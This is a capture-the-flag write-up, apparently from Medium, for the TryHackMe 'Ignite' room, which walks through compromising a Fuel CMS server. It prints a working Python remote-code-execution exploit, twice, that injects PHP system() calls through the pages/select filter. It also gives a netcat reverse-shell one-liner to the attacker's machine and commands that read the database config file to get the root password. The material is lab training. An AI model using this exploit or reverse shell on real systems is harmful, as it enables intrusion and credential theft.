TryHackMe | Ignite

Reconnaissance

Starting with a simple nmap scan to see which ports are open and what services are running on these ports.

nmap -sC -sV -O -oA simple_scan 10.10.75.216
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan

Enumeration

Open the url in browser.

http://10.10.75.216/
import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start

while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)

html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)

begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)

print r.text[0:dup]
import requests
import urllib

url = "http://10.10.75.216"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start

while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx
)+"%27%29%2b%27"

r = requests.get(burp0_url)

html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)

begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)

print r.text[0:dup]
nc -lvp 7896
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.13.70 7896 > /tmp/f
python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

I ran a couple of enumeration scripts but got nothing interesting. So I started looking around for background processes, but again found nothing.

cd /var/www/html/fuel/application/configcat /var/www/html/fuel/application/config/database.php
su root
cat /root/root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store